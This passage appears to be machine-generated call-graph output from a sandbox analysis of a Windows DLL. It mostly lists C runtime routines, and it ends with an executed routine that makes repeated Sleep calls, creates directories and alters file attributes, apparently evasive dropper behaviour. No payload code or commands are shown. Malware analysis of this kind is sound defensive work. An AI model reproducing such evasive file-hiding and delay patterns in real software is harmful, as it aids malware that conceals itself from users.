WideCharToMultiByte 9655 6e3403bc 9654->9655 9656 6e3403c8 FreeEnvironmentStringsW 9654->9656 9657 6e33b131 _free 66 API calls 9655->9657 9656->9652 9658 6e3403c4 9657->9658 9658->9656 9660 6e33fce8 __calloc_crt 66 API calls 9659->9660 9666 6e33fda0 9660->9666 9661 6e33ff4b GetStdHandle 9667 6e33ff15 9661->9667 9662 6e33ffaf SetHandleCount 9671 6e33bf9d 9662->9671 9663 6e33fce8 __calloc_crt 66 API calls 9663->9666 9664 6e33ff5d GetFileType 9664->9667 9665 6e33fe95 9665->9667 9668 6e33fec1 GetFileType 9665->9668 9669 6e33fecc InitializeCriticalSectionAndSpinCount 9665->9669 9666->9663 9666->9665 9666->9667 9666->9671 9667->9661 9667->9662 9667->9664 9670 6e33ff83 InitializeCriticalSectionAndSpinCount 9667->9670 9668->9665 9668->9669 9669->9665 9669->9671 9670->9667 9670->9671 9671->9608 9671->9609 9672->9585 9674 6e33e549 DecodePointer 9673->9674 9675 6e33e558 9673->9675 9674->9675 9676 6e33e569 TlsFree 9675->9676 9677 6e33e577 9675->9677 9676->9677 9678 6e33f35e DeleteCriticalSection 9677->9678 9679 6e33f376 9677->9679 9680 6e33b131 _free 66 API calls 9678->9680 9681 6e33f388 DeleteCriticalSection 9679->9681 9682 6e33f396 9679->9682 9680->9677 9681->9679 9682->9589 9684 6e3402a5 9683->9684 9685 6e3402aa GetModuleFileNameA 9683->9685 9921 6e33e1a2 9684->9921 9687 6e3402d1 9685->9687 9925 6e3400f6 9687->9925 9690 6e33fca3 __malloc_crt 66 API calls 9691 6e340313 9690->9691 9692 6e3400f6 _parse_cmdline 76 API calls 9691->9692 9693 6e33bfad 9691->9693 9692->9693 9693->9618 9694 6e34001a 9693->9694 9695 6e340023 9694->9695 9699 6e340028 _strlen 9694->9699 9696 6e33e1a2 ___initmbctable 94 API calls 9695->9696 9696->9699 9697 6e33bfb6 9697->9618 9710 6e33b778 9697->9710 9698 6e33fce8 __calloc_crt 66 API calls 9702 6e34005d _strlen 9698->9702 9699->9697 9699->9698 9700 6e3400ac 9701 6e33b131 _free 66 API calls 9700->9701 9701->9697 9702->9697 9702->9700 9703 6e33fce8 __calloc_crt 66 API calls 9702->9703 9704 6e3400d2 9702->9704 9707 6e3400e9 9702->9707 10241 6e33eab6 9702->10241 9703->9702 9705 6e33b131 _free 66 API calls 9704->9705 9705->9697 9708 6e33d9ef __invoke_watson 10 API calls 9707->9708 9709 6e3400f5 9708->9709 9713 6e33b786 __IsNonwritableInCurrentImage 9710->9713 9712 6e33b7a4 __initterm_e 9715 6e33b7c5 __IsNonwritableInCurrentImage 9712->9715 10250 6e33c8e3 9712->10250 10247 6e33f7a9 9713->10247 9715->9618 9720 6e33ffd0 9716->9720 9717 6e33bfd6 9717->9608 9718 6e33b131 _free 66 API calls 9718->9720 9719 6e33ffe9 DeleteCriticalSection 9719->9720 9720->9717 9720->9718 9720->9719 9722 6e33b80f _doexit 66 API calls 9721->9722 9723 6e33b986 9722->9723 9723->9578 9724->9579 9726 6e33c036 9725->9726 9727 6e33c028 9725->9727 9726->9585 9727->9726 9728 6e33e53f __mtterm 70 API calls 9727->9728 9728->9726 9730 6e33e520 DecodePointer TlsSetValue 9729->9730 9731 6e33c043 9729->9731 9730->9731 9732 6e33fce8 9731->9732 9734 6e33fcf1 9732->9734 9735 6e33c04f 9734->9735 9736 6e33fd0f Sleep 9734->9736 10315 6e33f91c 9734->10315 9735->9585 9735->9592 9737 6e33fd24 9736->9737 9737->9734 9737->9735 10324 6e33f130 9738->10324 9740 6e33e588 GetModuleHandleW 9741 6e33f472 __lock 64 API calls 9740->9741 9742 6e33e5c6 InterlockedIncrement 9741->9742 10325 6e33e61e 9742->10325 9745 6e33f472 __lock 64 API calls 9746 6e33e5e7 9745->9746 9747 6e33e1c0 ___addlocaleref 8 API calls 9746->9747 9748 6e33e605 9747->9748 10328 6e33e627 9748->10328 9750 6e33e612 __mtinitlocknum 9750->9606 9752 6e33b165 _free 9751->9752 9753 6e33b13c HeapFree 9751->9753 9752->9585 9753->9752 9754 6e33b151 9753->9754 9755 6e33da93 __mtinitlocknum 64 API calls 9754->9755 9756 6e33b157 GetLastError 9755->9756 9756->9752 9758 6e33e800 9757->9758 9759 6e33e84b 9757->9759 9762 6e33e806 TlsGetValue 9758->9762 9763 6e33e82d DecodePointer 9758->9763 9760 6e33e855 TlsSetValue 9759->9760 9761 6e33e85e 9759->9761 9760->9761 9761->9585 9764 6e33e819 TlsGetValue 9762->9764 9765 6e33e829 9762->9765 9766 6e33e843 9763->9766 9764->9765 9765->9763 10333 6e33e6c3 9766->10333 9777 6e33e4f9 EncodePointer 9768->9777 9770 6e33b729 __init_pointers __initp_misc_winsig 9778 6e33f529 EncodePointer 9770->9778 9772 6e33b74f EncodePointer EncodePointer EncodePointer EncodePointer 9773 6e33f2f8 9772->9773 9774 6e33f303 9773->9774 9775 6e33f30d InitializeCriticalSectionAndSpinCount 9774->9775 9776 6e33e96a 9774->9776 9775->9774 9775->9776 9776->9635 9776->9636 9777->9770 9778->9772 9782 6e33fcac 9779->9782 9781 6e33fce2 9781->9649 9781->9654 9782->9781 9783 6e33fcc3 Sleep 9782->9783 9784 6e33b16b 9782->9784 9783->9782 9785 6e33b1e8 9784->9785 9788 6e33b179 9784->9788 9786 6e33ee77 _malloc DecodePointer 9785->9786 9787 6e33b1ee 9786->9787 9789 6e33da93 __mtinitlocknum 65 API calls 9787->9789 9791 6e33b1a7 HeapAlloc 9788->9791 9794 6e33b1d4 9788->9794 9798 6e33b1d2 9788->9798 9800 6e33ee2f 9788->9800 9809 6e33ec80 9788->9809 9833 6e33b6f7 9788->9833 9836 6e33ee77 DecodePointer 9788->9836 9792 6e33b1e0 9789->9792 9791->9788 9791->9792 9792->9782 9838 6e33da93 9794->9838 9799 6e33da93 __mtinitlocknum 65 API calls 9798->9799 9799->9792 9841 6e3439dc 9800->9841 9802 6e33ee36 9803 6e33ee43 9802->9803 9804 6e3439dc __NMSG_WRITE 66 API calls 9802->9804 9805 6e33ec80 __NMSG_WRITE 66 API calls 9803->9805 9807 6e33ee65 9803->9807 9804->9803 9806 6e33ee5b 9805->9806 9808 6e33ec80 __NMSG_WRITE 66 API calls 9806->9808 9807->9788 9808->9807 9810 6e33eca1 __NMSG_WRITE 9809->9810 9812 6e3439dc __NMSG_WRITE 63 API calls 9810->9812 9832 6e33edbd 9810->9832 9814 6e33ecbb 9812->9814 9813 6e33ee2d 9813->9788 9815 6e33edcc GetStdHandle 9814->9815 9816 6e3439dc __NMSG_WRITE 63 API calls 9814->9816 9819 6e33edda _strlen 9815->9819 9815->9832 9817 6e33eccc 9816->9817 9817->9815 9818 6e33ecde 9817->9818 9818->9832 9860 6e343979 9818->9860 9822 6e33ee10 WriteFile 9819->9822 9819->9832 9822->9832 9823 6e33ed0a GetModuleFileNameW 9824 6e33ed2b 9823->9824 9827 6e33ed37 _wcslen 9823->9827 9825 6e343979 __NMSG_WRITE 63 API calls 9824->9825 9825->9827 9826 6e33d9ef __invoke_watson 10 API calls 9826->9827 9827->9826 9828 6e34381c 63 API calls __NMSG_WRITE 9827->9828 9830 6e33edad 9827->9830 9867 6e343891 9827->9867 9828->9827 9876 6e3436b0 9830->9876 9894 6e33a9d1 9832->9894 9904 6e33b6cc GetModuleHandleW 9833->9904 9837 6e33ee8c 9836->9837 9837->9788 9907 6e33e630 GetLastError 9838->9907 9840 6e33da98 9840->9798 9842 6e3439e8 9841->9842 9843 6e3439f2 9842->9843 9844 6e33da93 __mtinitlocknum 66 API calls 9842->9844 9843->9802 9845 6e343a0b 9844->9845 9848 6e33da41 9845->9848 9851 6e33da14 DecodePointer 9848->9851 9852 6e33da29 9851->9852 9857 6e33d9ef 9852->9857 9854 6e33da40 9855 6e33da14 __controlfp_s 10 API calls 9854->9855 9856 6e33da4d 9855->9856 9856->9802 9858 6e33d8c6 __call_reportfault 8 API calls 9857->9858 9859 6e33da01 GetCurrentProcess TerminateProcess 9858->9859 9859->9854 9861 6e343987 9860->9861 9862 6e3439a3 9861->9862 9863 6e33da93 __mtinitlocknum 66 API calls 9861->9863 9864 6e343993 9863->9864 9865 6e33da41 __controlfp_s 11 API calls 9864->9865 9866 6e33ecff 9865->9866 9866->9823 9866->9827 9868 6e3438a3 9867->9868 9870 6e3438ac 9868->9870 9872 6e3438a7 9868->9872 9874 6e3438ea 9868->9874 9869 6e33da93 __mtinitlocknum 66 API calls 9871 6e3438c3 9869->9871 9870->9827 9873 6e33da41 __controlfp_s 11 API calls 9871->9873 9872->9869 9872->9870 9873->9870 9874->9870 9875 6e33da93 __mtinitlocknum 66 API calls 9874->9875 9875->9871 9902 6e33e4f9 EncodePointer 9876->9902 9878 6e3436d6 9879 6e3436e6 LoadLibraryW 9878->9879 9880 6e343763 9878->9880 9881 6e3437fb 9879->9881 9882 6e3436fb GetProcAddress 9879->9882 9883 6e34377d DecodePointer DecodePointer 9880->9883 9891 6e343790 9880->9891 9888 6e33a9d1 __setmbcp_nolock 5 API calls 9881->9888 9882->9881 9886 6e343711 7 API calls 9882->9886 9883->9891 9884 6e3437c6 DecodePointer 9885 6e3437ef DecodePointer 9884->9885 9889 6e3437cd 9884->9889 9885->9881 9886->9880 9887 6e343753 GetProcAddress EncodePointer 9886->9887 9887->9880 9890 6e34381a 9888->9890 9889->9885 9892 6e3437e0 DecodePointer 9889->9892 9890->9832 9891->9884 9891->9885 9893 6e3437b3 9891->9893 9892->9885 9892->9893 9893->9885 9895 6e33a9db IsDebuggerPresent 9894->9895 9896 6e33a9d9 9894->9896 9903 6e34208e 9895->9903 9896->9813 9899 6e33cac7 SetUnhandledExceptionFilter UnhandledExceptionFilter 9900 6e33cae4 __call_reportfault 9899->9900 9901 6e33caec GetCurrentProcess TerminateProcess 9899->9901 9900->9901 9901->9813 9902->9878 9903->9899 9905 6e33b6e0 GetProcAddress 9904->9905 9906 6e33b6f0 ExitProcess 9904->9906 9905->9906 9908 6e33e50b ___set_flsgetvalue 3 API calls 9907->9908 9909 6e33e647 9908->9909 9910 6e33e69d SetLastError 9909->9910 9911 6e33fce8 __calloc_crt 62 API calls 9909->9911 9910->9840 9912 6e33e65b 9911->9912 9912->9910 9913 6e33e663 DecodePointer 9912->9913 9914 6e33e678 9913->9914 9915 6e33e694 9914->9915 9916 6e33e67c 9914->9916 9917 6e33b131 _free 62 API calls 9915->9917 9918 6e33e57c __getptd_noexit 62 API calls 9916->9918 9920 6e33e69a 9917->9920 9919 6e33e684 GetCurrentThreadId 9918->9919 9919->9910 9920->9910 9922 6e33e1ab 9921->9922 9924 6e33e1b2 9921->9924 9931 6e33e008 9922->9931 9924->9685 9927 6e340115 9925->9927 9928 6e340182 9927->9928 10235 6e343d86 9927->10235 9929 6e340280 9928->9929 9930 6e343d86 76 API calls _parse_cmdline 9928->9930 9929->9690 9929->9693 9930->9928 9932 6e33e014 __mtinitlocknum 9931->9932 9962 6e33e6a9 9932->9962 9936 6e33e027 9983 6e33dda3 9936->9983 9939 6e33fca3 __malloc_crt 66 API calls 9940 6e33e048 9939->9940 9941 6e33e167 __mtinitlocknum 9940->9941 9990 6e33de1f 9940->9990 9941->9924 9944 6e33e174 9944->9941 9948 6e33e187 9944->9948 9950 6e33b131 _free 66 API calls 9944->9950 9945 6e33e078 InterlockedDecrement 9946 6e33e099 InterlockedIncrement 9945->9946 9947 6e33e088 9945->9947 9946->9941 9949 6e33e0af 9946->9949 9947->9946 9952 6e33b131 _free 66 API calls 9947->9952 9951 6e33da93 __mtinitlocknum 66 API calls 9948->9951 9949->9941 10000 6e33f472 9949->10000 9950->9948 9951->9941 9953 6e33e098 9952->9953 9953->9946 9956 6e33e0c3 InterlockedDecrement 9957 6e33e152 InterlockedIncrement 9956->9957 9958 6e33e13f 9956->9958 10007 6e33e169 9957->10007 9958->9957 9960 6e33b131 _free 66 API calls 9958->9960 9961 6e33e151 9960->9961 9961->9957 9963 6e33e630 __getptd_noexit 66 API calls 9962->9963 9964 6e33e6b1 9963->9964 9965 6e33e01d 9964->9965 10010 6e33b98a 9964->10010 9967 6e33dcff 9965->9967 9968 6e33dd0b __mtinitlocknum 9967->9968 9969 6e33e6a9 __getptd 66 API calls 9968->9969 9970 6e33dd10 9969->9970 9971 6e33f472 __lock 66 API calls 9970->9971 9979 6e33dd22 9970->9979 9972 6e33dd40 9971->9972 9973 6e33dd89 9972->9973 9977 6e33dd71 InterlockedIncrement 9972->9977 9978 6e33dd57 InterlockedDecrement 9972->9978 10049 6e33dd9a 9973->10049 9975 6e33b98a __amsg_exit 66 API calls 9976 6e33dd30 __mtinitlocknum 9975->9976 9976->9936 9977->9973 9978->9977 9980 6e33dd62 9978->9980 9979->9975 9979->9976 9980->9977 9981 6e33b131 _free 66 API calls 9980->9981 9982 6e33dd70 9981->9982 9982->9977 10053 6e33aa64 9983->10053 9986 6e33ddc2 GetOEMCP 9989 6e33ddd2 9986->9989 9987 6e33dde0 9988 6e33dde5 GetACP 9987->9988 9987->9989 9988->9989 9989->9939 9989->9941 9991 6e33dda3 getSystemCP 78 API calls 9990->9991 9993 6e33de3f 9991->9993 9992 6e33de4a setSBCS 9994 6e33a9d1 __setmbcp_nolock 5 API calls 9992->9994 9993->9992 9996 6e33de8e IsValidCodePage 9993->9996 9999 6e33deb3 _memset __setmbcp_nolock 9993->9999 9995 6e33e006 9994->9995 9995->9944 9995->9945 9996->9992 9997 6e33dea0 GetCPInfo 9996->9997 9997->9992 9997->9999 10144 6e33db6f GetCPInfo 9999->10144 10001 6e33f487 10000->10001 10002 6e33f49a EnterCriticalSection 10000->10002 10205 6e33f3b0 10001->10205 10002->9956 10004 6e33f48d 10004->10002 10005 6e33b98a __amsg_exit 65 API calls 10004->10005 10006 6e33f499 10005->10006 10006->10002 10234 6e33f399 LeaveCriticalSection 10007->10234 10009 6e33e170 10009->9941 10011 6e33ee2f __FF_MSGBANNER 66 API calls 10010->10011 10012 6e33b994 10011->10012 10013 6e33ec80 __NMSG_WRITE 66 API calls 10012->10013 10014 6e33b99c 10013->10014 10017 6e33b965 10014->10017 10020 6e33b80f 10017->10020 10019 6e33b976 10021 6e33b81b __mtinitlocknum 10020->10021 10022 6e33f472 __lock 61 API calls 10021->10022 10023 6e33b822 10022->10023 10024 6e33b84d DecodePointer 10023->10024 10030 6e33b8cc 10023->10030 10026 6e33b864 DecodePointer 10024->10026 10024->10030 10039 6e33b877 10026->10039 10028 6e33b949 __mtinitlocknum 10028->10019 10043 6e33b93a 10030->10043 10031 6e33b931 10033 6e33b6f7 __mtinitlocknum 3 API calls 10031->10033 10034 6e33b93a 10033->10034 10035 6e33b947 10034->10035 10048 6e33f399 LeaveCriticalSection 10034->10048 10035->10019 10036 6e33b88e DecodePointer 10042 6e33e4f9 EncodePointer 10036->10042 10039->10030 10039->10036 10040 6e33b89d DecodePointer DecodePointer 10039->10040 10041 6e33e4f9 EncodePointer 10039->10041 10040->10039 10041->10039 10042->10039 10044 6e33b940 10043->10044 10045 6e33b91a 10043->10045 10046 6e33f399 _doexit LeaveCriticalSection 10044->10046 10045->10028 10047 6e33f399 LeaveCriticalSection 10045->10047 10046->10045 10047->10031 10048->10035 10052 6e33f399 LeaveCriticalSection 10049->10052 10051 6e33dda1 10051->9979 10052->10051 10054 6e33aa77 10053->10054 10060 6e33aac4 10053->10060 10055 6e33e6a9 __getptd 66 API calls 10054->10055 10056 6e33aa7c 10055->10056 10057 6e33aaa4 10056->10057 10061 6e33e480 10056->10061 10059 6e33dcff _LocaleUpdate::_LocaleUpdate 68 API calls 10057->10059 10057->10060 10059->10060 10060->9986 10060->9987 10062 6e33e48c __mtinitlocknum 10061->10062 10063 6e33e6a9 __getptd 66 API calls 10062->10063 10064 6e33e491 10063->10064 10065 6e33e4bf 10064->10065 10066 6e33e4a3 10064->10066 10067 6e33f472 __lock 66 API calls 10065->10067 10068 6e33e6a9 __getptd 66 API calls 10066->10068 10069 6e33e4c6 10067->10069 10070 6e33e4a8 10068->10070 10076 6e33e433 10069->10076 10074 6e33e4b6 __mtinitlocknum 10070->10074 10075 6e33b98a __amsg_exit 66 API calls 10070->10075 10074->10057 10075->10074 10077 6e33e475 10076->10077 10078 6e33e440 10076->10078 10084 6e33e4ed 10077->10084 10078->10077 10087 6e33e1c0 InterlockedIncrement 10078->10087 10080 6e33e456 10080->10077 10099 6e33e24f 10080->10099 10143 6e33f399 LeaveCriticalSection 10084->10143 10086 6e33e4f4 10086->10070 10088 6e33e1e1 10087->10088 10089 6e33e1de InterlockedIncrement 10087->10089 10090 6e33e1eb InterlockedIncrement 10088->10090 10091 6e33e1ee 10088->10091 10089->10088 10090->10091 10092 6e33e1fb 10091->10092 10093 6e33e1f8 InterlockedIncrement 10091->10093 10094 6e33e205 InterlockedIncrement 10092->10094 10096 6e33e208 10092->10096 10093->10092 10094->10096 10095 6e33e221 InterlockedIncrement 10095->10096 10096->10095 10097 6e33e231 InterlockedIncrement 10096->10097 10098 6e33e23c InterlockedIncrement 10096->10098 10097->10096 10098->10080 10100 6e33e2e3 10099->10100 10101 6e33e260 InterlockedDecrement 10099->10101 10100->10077 10113 6e33e2e8 10100->10113 10102 6e33e275 InterlockedDecrement 10101->10102 10103 6e33e278 10101->10103 10102->10103 10104 6e33e282 InterlockedDecrement 10103->10104 10105 6e33e285 10103->10105 10104->10105 10106 6e33e292 10105->10106 10107 6e33e28f InterlockedDecrement 10105->10107 10108 6e33e29c InterlockedDecrement 10106->10108 10110 6e33e29f 10106->10110 10107->10106 10108->10110 10109 6e33e2b8 InterlockedDecrement 10109->10110 10110->10109 10111 6e33e2c8 InterlockedDecrement 10110->10111 10112 6e33e2d3 InterlockedDecrement 10110->10112 10111->10110 10112->10100 10114 6e33e36c 10113->10114 10115 6e33e2ff 10113->10115 10116 6e33e3b9 10114->10116 10117 6e33b131 _free 66 API calls 10114->10117 10115->10114 10125 6e33b131 _free 66 API calls 10115->10125 10141 6e33e333 10115->10141 10119 6e342dcc ___free_lc_time 66 API calls 10116->10119 10132 6e33e3e2 10116->10132 10118 6e33e38d 10117->10118 10120 6e33b131 _free 66 API calls 10118->10120 10121 6e33e3d7 10119->10121 10122 6e33e3a0 10120->10122 10126 6e33b131 _free 66 API calls 10121->10126 10127 6e33b131 _free 66 API calls 10122->10127 10123 6e33b131 _free 66 API calls 10129 6e33e361 10123->10129 10124 6e33e427 10130 6e33b131 _free 66 API calls 10124->10130 10131 6e33e328 10125->10131 10126->10132 10133 6e33e3ae 10127->10133 10128 6e33b131 _free 66 API calls 10134 6e33e349 10128->10134 10136 6e33b131 _free 66 API calls 10129->10136 10137 6e33e42d 10130->10137 10138 6e3431ac ___free_lconv_mon 66 API calls 10131->10138 10132->10124 10135 6e33b131 66 API calls _free 10132->10135 10139 6e33b131 _free 66 API calls 10133->10139 10140 6e343143 ___free_lconv_num 66 API calls 10134->10140 10135->10132 10136->10114 10137->10077 10138->10141 10139->10116 10142 6e33e354 10140->10142 10141->10128 10141->10142 10142->10123 10143->10086 10145 6e33dc57 10144->10145 10148 6e33dba3 _memset 10144->10148 10150 6e33a9d1 __setmbcp_nolock 5 API calls 10145->10150 10154 6e342d8c 10148->10154 10152 6e33dcfd 10150->10152 10152->9999 10153 6e33fba5 ___crtLCMapStringA 82 API calls 10153->10145 10155 6e33aa64 _LocaleUpdate::_LocaleUpdate 76 API calls 10154->10155 10156 6e342d9f 10155->10156 10164 6e342ca5 10156->10164 10159 6e33fba5 10160 6e33aa64 _LocaleUpdate::_LocaleUpdate 76 API calls 10159->10160 10161 6e33fbb8 10160->10161 10181 6e33f9be 10161->10181 10165 6e342cc3 10164->10165 10166 6e342cce MultiByteToWideChar 10164->10166 10165->10166 10169 6e342cfb 10166->10169 10176 6e342cf7 10166->10176 10167 6e33a9d1 __setmbcp_nolock 5 API calls 10170 6e33dc12 10167->10170 10168 6e342d10 _memset __crtGetStringTypeA_stat 10171 6e342d49 MultiByteToWideChar 10168->10171 10168->10176 10169->10168 10172 6e33b16b _malloc 66 API calls 10169->10172 10170->10159 10173 6e342d70 10171->10173 10174 6e342d5f GetStringTypeW 10171->10174 10172->10168 10177 6e33f99e 10173->10177 10174->10173 10176->10167 10178 6e33f9bb 10177->10178 10179 6e33f9aa 10177->10179 10178->10176 10179->10178 10180 6e33b131 _free 66 API calls 10179->10180 10180->10178 10182 6e33f9dc MultiByteToWideChar 10181->10182 10186 6e33fa41 10182->10186 10194 6e33fa3a 10182->10194 10184 6e33fa5a __crtGetStringTypeA_stat 10187 6e33fa8e MultiByteToWideChar 10184->10187 10184->10194 10185 6e33a9d1 __setmbcp_nolock 5 API calls 10188 6e33dc32 10185->10188 10186->10184 10189 6e33b16b _malloc 66 API calls 10186->10189 10190 6e33fb86 10187->10190 10191 6e33faa7 LCMapStringW 10187->10191 10188->10153 10189->10184 10192 6e33f99e __freea 66 API calls 10190->10192 10191->10190 10193 6e33fac6 10191->10193 10192->10194 10195 6e33fad0 10193->10195 10198 6e33faf9 10193->10198 10194->10185 10195->10190 10196 6e33fae4 LCMapStringW 10195->10196 10196->10190 10197 6e33fb48 LCMapStringW 10199 6e33fb80 10197->10199 10200 6e33fb5e WideCharToMultiByte 10197->10200 10201 6e33fb14 __crtGetStringTypeA_stat 10198->10201 10202 6e33b16b _malloc 66 API calls 10198->10202 10203 6e33f99e __freea 66 API calls 10199->10203 10200->10199 10201->10190 10201->10197 10202->10201 10203->10190 10206 6e33f3bc __mtinitlocknum 10205->10206 10207 6e33ee2f __FF_MSGBANNER 65 API calls 10206->10207 10219 6e33f3e2 10206->10219 10209 6e33f3d1 10207->10209 10208 6e33fca3 __malloc_crt 65 API calls 10210 6e33f3fd 10208->10210 10211 6e33ec80 __NMSG_WRITE 65 API calls 10209->10211 10212 6e33f413 10210->10212 10213 6e33f404 10210->10213 10215 6e33f3d8 10211->10215 10217 6e33f472 __lock 65 API calls 10212->10217 10216 6e33da93 __mtinitlocknum 65 API calls 10213->10216 10214 6e33f3f2 __mtinitlocknum 10214->10004 10218 6e33b6f7 __mtinitlocknum 3 API calls 10215->10218 10216->10214 10220 6e33f41a 10217->10220 10218->10219 10219->10208 10219->10214 10221 6e33f422 InitializeCriticalSectionAndSpinCount 10220->10221 10222 6e33f44d 10220->10222 10224 6e33f432 10221->10224 10225 6e33f43e 10221->10225 10223 6e33b131 _free 65 API calls 10222->10223 10223->10225 10226 6e33b131 _free 65 API calls 10224->10226 10230 6e33f469 10225->10230 10228 6e33f438 10226->10228 10229 6e33da93 __mtinitlocknum 65 API calls 10228->10229 10229->10225 10233 6e33f399 LeaveCriticalSection 10230->10233 10232 6e33f470 10232->10214 10233->10232 10234->10009 10238 6e343d33 10235->10238 10239 6e33aa64 _LocaleUpdate::_LocaleUpdate 76 API calls 10238->10239 10240 6e343d46 10239->10240 10240->9927 10242 6e33eac4 10241->10242 10243 6e33eada 10242->10243 10244 6e33da93 __mtinitlocknum 66 API calls 10242->10244 10243->9702 10245 6e33ead0 10244->10245 10246 6e33da41 __controlfp_s 11 API calls 10245->10246 10246->10243 10248 6e33f7af EncodePointer 10247->10248 10248->10248 10249 6e33f7c9 10248->10249 10249->9712 10253 6e33c8a7 10250->10253 10252 6e33c8f0 10252->9715 10254 6e33c8b3 __mtinitlocknum 10253->10254 10261 6e33b70f 10254->10261 10260 6e33c8d4 __mtinitlocknum 10260->10252 10262 6e33f472 __lock 66 API calls 10261->10262 10263 6e33b716 10262->10263 10264 6e33c7c0 DecodePointer DecodePointer 10263->10264 10265 6e33c86f 10264->10265 10266 6e33c7ee 10264->10266 10275 6e33c8dd 10265->10275 10266->10265 10278 6e3414ac 10266->10278 10268 6e33c852 EncodePointer EncodePointer 10268->10265 10269 6e33c800 10269->10268 10270 6e33c824 10269->10270 10285 6e33fd34 10269->10285 10270->10265 10272 6e33fd34 __realloc_crt 70 API calls 10270->10272 10273 6e33c840 EncodePointer 10270->10273 10274 6e33c83a 10272->10274 10273->10268 10274->10265 10274->10273 10311 6e33b718 10275->10311 10279 6e3414b7 10278->10279 10280 6e3414cc HeapSize 10278->10280 10281 6e33da93 __mtinitlocknum 66 API calls 10279->10281 10280->10269 10282 6e3414bc 10281->10282 10283 6e33da41 __controlfp_s 11 API calls 10282->10283 10284 6e3414c7 10283->10284 10284->10269 10289 6e33fd3d 10285->10289 10287 6e33fd7c 10287->10270 10288 6e33fd5d Sleep 10288->10289 10289->10287 10289->10288 10290 6e343c86 10289->10290 10291 6e343c91 10290->10291 10292 6e343c9c 10290->10292 10293 6e33b16b _malloc 66 API calls 10291->10293 10294 6e343ca4 10292->10294 10302 6e343cb1 10292->10302 10295 6e343c99 10293->10295 10296 6e33b131 _free 66 API calls 10294->10296 10295->10289 10310 6e343cac _free 10296->10310 10297 6e343ce9 10298 6e33ee77 _malloc DecodePointer 10297->10298 10300 6e343cef 10298->10300 10299 6e343cb9 HeapReAlloc 10299->10302 10299->10310 10303 6e33da93 __mtinitlocknum 66 API calls 10300->10303 10301 6e343d19 10305 6e33da93 __mtinitlocknum 66 API calls 10301->10305 10302->10297 10302->10299 10302->10301 10304 6e33ee77 _malloc DecodePointer 10302->10304 10307 6e343d01 10302->10307 10303->10310 10304->10302 10306 6e343d1e GetLastError 10305->10306 10306->10310 10308 6e33da93 __mtinitlocknum 66 API calls 10307->10308 10309 6e343d06 GetLastError 10308->10309 10309->10310 10310->10289 10314 6e33f399 LeaveCriticalSection 10311->10314 10313 6e33b71f 10313->10260 10314->10313 10316 6e33f928 10315->10316 10320 6e33f943 10315->10320 10317 6e33f934 10316->10317 10316->10320 10318 6e33da93 __mtinitlocknum 65 API calls 10317->10318 10321 6e33f939 10318->10321 10319 6e33f956 HeapAlloc 10319->10320 10323 6e33f97d 10319->10323 10320->10319 10322 6e33ee77 _malloc DecodePointer 10320->10322 10320->10323 10321->9734 10322->10320 10323->9734 10324->9740 10331 6e33f399 LeaveCriticalSection 10325->10331 10327 6e33e5e0 10327->9745 10332 6e33f399 LeaveCriticalSection 10328->10332 10330 6e33e62e 10330->9750 10331->10327 10332->10330 10334 6e33e6cf __mtinitlocknum 10333->10334 10335 6e33e6e7 10334->10335 10336 6e33e7d1 __mtinitlocknum 10334->10336 10337 6e33b131 _free 66 API calls 10334->10337 10338 6e33e6f5 10335->10338 10339 6e33b131 _free 66 API calls 10335->10339 10336->9759 10337->10335 10340 6e33e703 10338->10340 10342 6e33b131 _free 66 API calls 10338->10342 10339->10338 10341 6e33e711 10340->10341 10343 6e33b131 _free 66 API calls 10340->10343 10344 6e33e71f 10341->10344 10345 6e33b131 _free 66 API calls 10341->10345 10342->10340 10343->10341 10346 6e33b131 _free 66 API calls 10344->10346 10348 6e33e72d 10344->10348 10345->10344 10346->10348 10347 6e33e74c 10351 6e33f472 __lock 66 API calls 10347->10351 10349 6e33b131 _free 66 API calls 10348->10349 10352 6e33e73b 10348->10352 10349->10352 10350 6e33b131 _free 66 API calls 10350->10347 10353 6e33e754 10351->10353 10352->10347 10352->10350 10354 6e33e760 InterlockedDecrement 10353->10354 10355 6e33e779 10353->10355 10354->10355 10356 6e33e76b 10354->10356 10369 6e33e7dd 10355->10369 10356->10355 10359 6e33b131 _free 66 API calls 10356->10359 10359->10355 10360 6e33f472 __lock 66 API calls 10361 6e33e78d 10360->10361 10362 6e33e7be 10361->10362 10363 6e33e24f ___removelocaleref 8 API calls 10361->10363 10372 6e33e7e9 10362->10372 10367 6e33e7a2 10363->10367 10366 6e33b131 _free 66 API calls 10366->10336 10367->10362 10368 6e33e2e8 ___freetlocinfo 66 API calls 10367->10368 10368->10362 10375 6e33f399 LeaveCriticalSection 10369->10375 10371 6e33e786 10371->10360 10376 6e33f399 LeaveCriticalSection 10372->10376 10374 6e33e7cb 10374->10366 10375->10371 10376->10374

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 172 6e3332bd-6e333432 call 6e340750 call 6e33c980 177 6e333434-6e333447 172->177 177->177 178 6e333449-6e333559 Sleep call 6e33c980 177->178 181 6e33355b-6e33356e 178->181 181->181 182 6e333570-6e333683 Sleep call 6e33c980 181->182 185 6e333685-6e333698 182->185 185->185 186 6e33369a-6e3337a9 call 6e33c980 185->186 189 6e3337ab-6e3337be 186->189 189->189 190 6e3337c0-6e333800 call 6e33b67b call 6e33b54c call 6e33c980 call 6e33b55e 189->190 199 6e333802-6e333826 call 6e33b55e 190->199 200 6e333828-6e3338c9 Sleep call 6e33c980 wsprintfA call 6e33c980 190->200 199->200 207 6e3338cb-6e3338dc 200->207 207->207 208 6e3338de-6e333936 Sleep MakeSureDirectoryPathExists Sleep call 6e33c980 wsprintfA Sleep 207->208 211 6e333937-6e33393d 208->211 211->211 212 6e33393f-6e3339d9 GetFileAttributesA SetFileAttributesA call 6e33c980 wsprintfA call 6e33c980 211->212 217 6e3339db-6e3339ec 212->217 217->217 218 6e3339ee-6e333a5d Sleep call 6e33c980 wsprintfA call 6e33c980 217->218 223 6e333a5f-6e333a70 218->223 223->223 224 6e333a72-6e333ae1 Sleep call 6e33c980 wsprintfA call 6e33c980 223->224 229 6e333ae3-6e333af4 224->229 229->229 230 6e333af6-6e333b65 Sleep call 6e33c980 wsprintfA call 6e33c980 229->230 235 6e333b67-6e333b78 230->235 235->235 236 6e333b7a 235->236 237 6e333b7f-6e333bb4 call 6e332927 Sleep 236->237 240 6e333bb6-6e333be7 call 6e332927 Sleep 237->240 243 6e333be9-6e333c1a call 6e332927 Sleep 240->243 246 6e333c1c-6e333c4d call 6e332927 Sleep 243->246 249 6e333c4f-6e333c76 call 6e33b67b call 6e33b54c call 6e33c980 246->249 256 6e333c78-6e333c94 call 6e33b55e 249->256 259 6e333c96-6e333ee4 call 